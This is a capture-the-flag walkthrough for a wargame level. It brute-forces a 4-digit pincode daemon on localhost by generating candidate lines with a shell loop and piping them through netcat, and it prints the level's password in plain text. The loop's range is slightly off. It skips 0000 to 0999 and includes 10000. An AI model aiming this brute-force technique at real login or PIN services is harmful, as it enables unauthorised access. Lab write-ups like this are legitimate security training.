Level 24
A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
We have to perform a bruteforce attach to get password for next Level.
Lets connect using netcat and see what happens.
bandit24@bandit:~$ nc localhost 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0000
Wrong! Please enter the correct pincode. Try again.
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 1111
Wrong! Please enter the correct pincode. Try again.
Timeout. Exiting.
We will generate a file containing password and all possible 4 digits numbers. This is done using below one liner.
bandit24@bandit:~$ for i in {1000..10000}; do echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" >> /tmp/payload24 ; done
Now provide this file as input to netcat and this will reveal password for next Level.
Final Command:
bandit24@bandit:~$ nc localhost 30002 < /tmp/payload24
Solution Screenshot: